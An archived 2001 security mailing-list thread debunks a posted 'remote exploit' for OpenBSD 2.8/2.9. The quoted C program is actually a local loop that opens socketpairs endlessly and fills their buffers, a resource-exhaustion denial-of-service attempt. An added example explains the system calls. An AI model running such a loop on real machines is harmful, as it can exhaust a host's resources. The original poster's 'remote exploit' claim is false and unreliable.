The code doesn't do anything. I ran it on an obsd 2.8 machine and the state
of the machine after execution was the same as before. From what I understand
from this code, it simply opens up 2 local (PF_UNIX) sockets, and writes
some garbage to both of them. Socket option calls change receive and send
buffers on the socket, which I guess has something to do with the size of
the garbage we send to the local sockets. The fcntl call sets the non-block
flag on the sockets (I'm not sure I understand what this is, and the man
pages are rather concise on this, but I guess it makes it a non-block
device?), and then two write calls, where the crap gets written into sockets.

Now, I am by no means an expert or even an experienced programmer, and this
analysis is my attempt to understand unix programming better, so please, all
flames are welcome. I'm posting this just to see if my assumptions are
correct, not to actually give a guru-level analysis. (So if this isn't
posted, I'll live.)

Thanks for letting me waste everyone's time : )

max

On Wed, 6 Jun 2001, Blue Boar wrote:

> I let this through so that it might be refuted.
>
> Now, I'm no expert on the socket calls... but it seems
> to me that if this were a remote exploit, there
> would have to be a destination IP address..or port
> number.. or, you know, some sort of shellcode or
> something.
>
> So what is it then, a fork bomb for the machine that runs it?
>
> Ryan
>
> Fsck Theo Dumbraadt wrote:
> > > > This code shows a remote exploit for OpenBSD versions 2.8 and 2.9
> > > > and can now be released to the public to break theo's 4 years without
> > > > remote exploits sayings. I wrote it while people told me it could not
> > > > happen on the list so here is your proof bitch.
> > > >
> > > > //
> > > > // peewee.c
> > > > // peewee herman proof of concept this code will show all of the
> > > > // world how vulnerable OpenBSD is and how Theo Dumbraadt is
> > > > // not more than a liar copyraadt 2001 by Jigglypuff
> > > > // http://home.online.no/~wiighome/ninasiden/Jigglypuff.jpg
> > > > // this proggie is GPL licensed to those who use it keep my
> > > > // credits and not be a lamer
> > > > //
> > > > #include <unistd.h>
> > > > #include <sys/socket.h>
> > > > #include <fcntl.h>
> > > > #define BUFFERSIZE 409600
> > > > extern int
> > > > main(void)
> > > > {
> > > >     int p[2], i;
> > > >     char crap[BUFFERSIZE];
> > > >     while (1)
> > > >     {
> > > >         if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
> > > >             break;
> > > >         i = BUFFERSIZE;
> > > >         setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
> > > >         setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
> > > >         setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
> > > >         setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
> > > >         fcntl(p[0], F_SETFL, O_NONBLOCK);
> > > >         fcntl(p[1], F_SETFL, O_NONBLOCK);
> > > >         write(p[0], crap, BUFFERSIZE);
> > > >         write(p[1], crap, BUFFERSIZE);
> > > >     }
> > > >     return(0);
> > > > }
> > > >
> > > > * Get your free email at http://www.inbox.net
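
Added example, not part of the original post or of the quoted code: a single instrumented pass over the same calls (socketpair, setsockopt, fcntl, write), showing what O_NONBLOCK does to write() once the peer stops reading and which per-process limit bounds the quoted loop. The function names fill_one_end and fd_budget are made up for this illustration.

```c
/* Added example, not from the thread; fill_one_end/fd_budget are made-up names. */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/resource.h>
#include <sys/socket.h>
#include <unistd.h>

#define BUFFERSIZE 409600

/* Bytes the kernel queues on one socketpair end before a non-blocking write()
 * refuses more, or -1 if socketpair() fails. *last_errno gets that errno. */
long fill_one_end(int *last_errno)
{
    static char crap[BUFFERSIZE];      /* zero-filled sample payload */
    int p[2], want = BUFFERSIZE;
    long total = 0;
    ssize_t n;
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
        return -1;                     /* the quoted loop breaks out here too */
    setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &want, sizeof(want));
    setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &want, sizeof(want));
    /* O_NONBLOCK: write() returns at once with a short count or -1/EAGAIN
     * instead of sleeping until the peer reads. */
    fcntl(p[0], F_SETFL, fcntl(p[0], F_GETFL) | O_NONBLOCK);
    while ((n = write(p[0], crap, BUFFERSIZE)) > 0)
        total += n;                    /* nobody reads p[1], so data piles up */
    *last_errno = errno;
    close(p[0]);                       /* the quoted code never closes its pairs */
    close(p[1]);
    return total;
}

/* Soft RLIMIT_NOFILE: how many socket ends one process may hold open at once. */
long fd_budget(void)
{
    struct rlimit rl;
    if (getrlimit(RLIMIT_NOFILE, &rl) == -1 || rl.rlim_cur == RLIM_INFINITY)
        return -1;
    return (long)rl.rlim_cur;
}

int main(void)
{
    int e = 0;
    long q = fill_one_end(&e);
    printf("queued %ld bytes, errno %d, fd limit %ld\n", q, e, fd_budget());
    return q > 0 ? 0 : 1;
}
```

Because the quoted loop never calls close(), every pass keeps two more descriptors and their queued bytes alive, and it stops only when socketpair() returns -1, for instance once the descriptor limit reported by fd_budget() is reached.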
This archive was generated by hypermail 2b30 : Wed Jun 06 2001 - 20:03:43 PDT